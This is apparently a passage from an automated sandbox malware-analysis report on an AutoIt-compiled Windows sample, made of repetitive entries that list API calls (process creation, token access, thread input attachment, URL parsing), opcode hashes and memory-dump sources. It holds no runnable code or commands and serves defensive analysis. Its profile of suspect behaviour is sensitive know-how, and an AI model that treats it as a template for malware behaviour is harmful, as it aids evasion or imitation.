                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                        • Instruction ID: 5e6e4a9f460d7ffc39560bf0a0bb50c1bd74bcdd5924254e0332c0e992becc76
                                                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                        • Instruction Fuzzy Hash: E501403644824ABBCF126E85CC018EE3F62BF99351F598555FA1868031D237C9B1BF81
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0100B59E
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0100B5B6
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0100B5DA
                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0100B5F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 357397906-0
                                                                                                                        • Opcode ID: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                                                                                                                        • Instruction ID: 1e747bfc92c9febfb178c8c26fc3e839158c042f2237ec873bb727a979eee62e
                                                                                                                        • Opcode Fuzzy Hash: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                                                                                                                        • Instruction Fuzzy Hash: 471166B9D0420AEFDB51DFA9C444AEEFBF9FB08310F104166E954E3210D735AA519F50
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 0100B8FE
                                                                                                                        • _memset.LIBCMT ref: 0100B90D
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01047F20,01047F64), ref: 0100B93C
                                                                                                                        • CloseHandle.KERNEL32 ref: 0100B94E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3277943733-0
                                                                                                                        • Opcode ID: 0cf67882a572c7d8e0978ee5d0818fbe2a62d46bc2110141285feb2e1e9fa74e
                                                                                                                        • Instruction ID: 6ee3673c040609f4d71f20e37a5776971c163be76bf7c76487320f2d916c4469
                                                                                                                        • Opcode Fuzzy Hash: 0cf67882a572c7d8e0978ee5d0818fbe2a62d46bc2110141285feb2e1e9fa74e
                                                                                                                        • Instruction Fuzzy Hash: 5DF082F65403007BF2312B65AC85FBB7B9CEB09758F004460BF88D5286E77B490097A8
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00FE6E88
                                                                                                                          • Part of subcall function 00FE794E: _memset.LIBCMT ref: 00FE7983
                                                                                                                        • _memmove.LIBCMT ref: 00FE6EAB
                                                                                                                        • _memset.LIBCMT ref: 00FE6EB8
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00FE6EC8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 48991266-0
                                                                                                                        • Opcode ID: 459415ff6dcf4a5484a9745be8aa7d7e17bc63f697611097308e3097797f3cd1
                                                                                                                        • Instruction ID: ba620b4560f0994749f175a23188896e64898c912432b3044001517b94d3cff2
                                                                                                                        • Opcode Fuzzy Hash: 459415ff6dcf4a5484a9745be8aa7d7e17bc63f697611097308e3097797f3cd1
                                                                                                                        • Instruction Fuzzy Hash: 0BF05E7A200200ABCF116F55DC85A8ABB2AEF45360F04C051FE089E21BC73AE911EBB4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F8134D
                                                                                                                          • Part of subcall function 00F812F3: SelectObject.GDI32(?,00000000), ref: 00F8135C
                                                                                                                          • Part of subcall function 00F812F3: BeginPath.GDI32(?), ref: 00F81373
                                                                                                                          • Part of subcall function 00F812F3: SelectObject.GDI32(?,00000000), ref: 00F8139C
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0100C030
                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 0100C03D
                                                                                                                        • EndPath.GDI32(00000000), ref: 0100C04D
                                                                                                                        • StrokePath.GDI32(00000000), ref: 0100C05B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1539411459-0
                                                                                                                        • Opcode ID: b86d95a45dfc3ce6ad7331d86315fa64af6af625a483a84b3836a83d457e1b28
                                                                                                                        • Instruction ID: b87dec685df4e7a28939e159f9a16c8d9678b3a36c60c04b4610315c0d55eac2
                                                                                                                        • Opcode Fuzzy Hash: b86d95a45dfc3ce6ad7331d86315fa64af6af625a483a84b3836a83d457e1b28
                                                                                                                        • Instruction Fuzzy Hash: F4F09A3100021ABBEB33AF54AC09FCA3F98AF06310F048240FA91210C187AA0161EB95
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FDA399
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA3AC
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00FDA3B3
                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 00FDA3BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2710830443-0
                                                                                                                        • Opcode ID: be260b6609f8f4070e06366f6a7f7a6e40bd9bd058b5bf65e62a7324f0bca102
                                                                                                                        • Instruction ID: 7234b66b4236296e00ebccbed803656ee1d9422eacb39e8908906fa8b33a3e06
                                                                                                                        • Opcode Fuzzy Hash: be260b6609f8f4070e06366f6a7f7a6e40bd9bd058b5bf65e62a7324f0bca102
                                                                                                                        • Instruction Fuzzy Hash: 87E03931545328BBDB315BA2DC0CEDB3F1DEF1A7A1F048015F548C4050CA76C540EBA0
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000008), ref: 00F82231
                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00F8223B
                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00F82250
                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00F82258
                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00FBC0D3
                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FBC0E0
                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00FBC0F9
                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00FBC112
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00FBC132
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00FBC13D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1946975507-0
                                                                                                                        • Opcode ID: 41ed82c38fdc76ffdbe408543cb7c357bc213274e3296b8b0e1063e5648386ff
                                                                                                                        • Instruction ID: ca7e4148254968f1cf7a0d133789f3dfcd644cf35a0a7716ccd5570195b87ca7
                                                                                                                        • Opcode Fuzzy Hash: 41ed82c38fdc76ffdbe408543cb7c357bc213274e3296b8b0e1063e5648386ff
                                                                                                                        • Instruction Fuzzy Hash: CFE06D32600245ABEB725F68F80D7D83B10EB06332F008366FBA9980E587764990EF51
                                                                                                                        APIs
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00FD8C63
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FD882E), ref: 00FD8C6A
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FD882E), ref: 00FD8C77
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FD882E), ref: 00FD8C7E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974789173-0
                                                                                                                        • Opcode ID: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                                                                                                                        • Instruction ID: 08d766e174245bca2674ea6c681734799f00fbcf6ed754787dc9703c69ade14e
                                                                                                                        • Opcode Fuzzy Hash: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                                                                                                                        • Instruction Fuzzy Hash: 7BE08636A42212DBD7309FB06D0CB563BBCEF507E2F088818B2C5C9044DA398442EB71
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 00FC2187
                                                                                                                        • GetDC.USER32(00000000), ref: 00FC2191
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FC21B1
                                                                                                                        • ReleaseDC.USER32(?), ref: 00FC21D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: d1652682411a0f7967ffed26e53caa9af4e016b7e898edcff05f5dfc0cdf465d
                                                                                                                        • Instruction ID: abc7425c7d773e1a343061ff3adacfc45fb771b5a328072f2917921361f1bc3d
                                                                                                                        • Opcode Fuzzy Hash: d1652682411a0f7967ffed26e53caa9af4e016b7e898edcff05f5dfc0cdf465d
                                                                                                                        • Instruction Fuzzy Hash: 38E0E575800606EFDB62AFB0C808BAD7BB1EB4C350F108409F99A97210CB7D9141BF40
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 00FC219B
                                                                                                                        • GetDC.USER32(00000000), ref: 00FC21A5
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FC21B1
                                                                                                                        • ReleaseDC.USER32(?), ref: 00FC21D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: 3e3aa11aaca5481c2ce51b3176c7ac5a529f9adc6ba859a76ec36427531a3556
                                                                                                                        • Instruction ID: aecbb1659536800bf52c2029073025d3862f3a4dd4e43df65acca79e00ce3c7f
                                                                                                                        • Opcode Fuzzy Hash: 3e3aa11aaca5481c2ce51b3176c7ac5a529f9adc6ba859a76ec36427531a3556
                                                                                                                        • Instruction Fuzzy Hash: 8CE012B5800606AFCB62AFB0C8086AD7BF1EB4C310F108009F99AA7210CB7E9141AF40
                                                                                                                        APIs
                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00FDB981
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContainedObject
                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                        • Opcode ID: 9ae7eeef4fa9eac40dcd763a19a4259332b46eefa7d257992708317f8d4f85b2
                                                                                                                        • Instruction ID: 877f90f83babe9db73a0a1da4b9b8750a4695275fa21ff5acf834d571e415f52
                                                                                                                        • Opcode Fuzzy Hash: 9ae7eeef4fa9eac40dcd763a19a4259332b46eefa7d257992708317f8d4f85b2
                                                                                                                        • Instruction Fuzzy Hash: CF914971600201DFDB24DF64C884B6AB7E9FF48710F29856EE94ACB391DB70E841DB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F9FEC6: _wcscpy.LIBCMT ref: 00F9FEE9
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00FEB298
                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FEB361
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                        • String ID: LPT
                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                        • Opcode ID: fd714de498fdbbac2604a1c28cb31576684bff4251bc3b3a7203dd1ccb4ca3ec
                                                                                                                        • Instruction ID: bd33d800a3157e5603fcb097da823a54171ce5c2063a35f4ea4ba25fd42e6841
                                                                                                                        • Opcode Fuzzy Hash: fd714de498fdbbac2604a1c28cb31576684bff4251bc3b3a7203dd1ccb4ca3ec
                                                                                                                        • Instruction Fuzzy Hash: 1F61A276E00215EFCB14EF95C886EAEB7B4EF08310F15406AF546AB291DB74AE40EB50
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00F92AC8
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F92AE1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                        • Opcode ID: ebd257ed64a84c0f0870686b00207c1d083ebcb9b2729c2a17da5918f0ab7bbb
                                                                                                                        • Instruction ID: df7156ca162f46393de28f7eded1eb792f877d7b64d5539b67b71cb079bf157b
                                                                                                                        • Opcode Fuzzy Hash: ebd257ed64a84c0f0870686b00207c1d083ebcb9b2729c2a17da5918f0ab7bbb
                                                                                                                        • Instruction Fuzzy Hash: 7D5165724187449BD320BF60DC86BABBBF8FF84314F56884CF1DA81095DB798429DB26
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F8506B: __fread_nolock.LIBCMT ref: 00F85089
                                                                                                                        • _wcscmp.LIBCMT ref: 00FE9AAE
                                                                                                                        • _wcscmp.LIBCMT ref: 00FE9AC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                        • String ID: FILE
                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                        • Opcode ID: 07ff3a0994246fd1dc56e248f9540b891d661b9d0e53e4e7fbf8747b885d4c94
                                                                                                                        • Instruction ID: f5cfeb146572fe07bd1a6f47f16a9ebf0a3ed542622a42cadbf192cf7d459e6f
                                                                                                                        • Opcode Fuzzy Hash: 07ff3a0994246fd1dc56e248f9540b891d661b9d0e53e4e7fbf8747b885d4c94
                                                                                                                        • Instruction Fuzzy Hash: 2141D871A0464ABBDF20AAA5DC45FEFBBFDDF45B14F000069B900E7181D6B9AA0497B1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FF2892
                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FF28C8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                        • String ID: |
                                                                                                                        • API String ID: 1413715105-2343686810
                                                                                                                        • Opcode ID: 07a6ab945894c8e976b9d37007ec4c43d8cdbb318eff94e1ef1dcd58b8b48b90
                                                                                                                        • Instruction ID: ad08420f349a5cba2ac9a7aa59432406795bebae63e4bfd26bc68f0e1b9be020
                                                                                                                        • Opcode Fuzzy Hash: 07a6ab945894c8e976b9d37007ec4c43d8cdbb318eff94e1ef1dcd58b8b48b90
                                                                                                                        • Instruction Fuzzy Hash: 4C315D71801219AFCF11EFA0CC85EEEBFB9FF08350F104029F914A6165DB359A56EB60
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 01006D86
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01006DC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
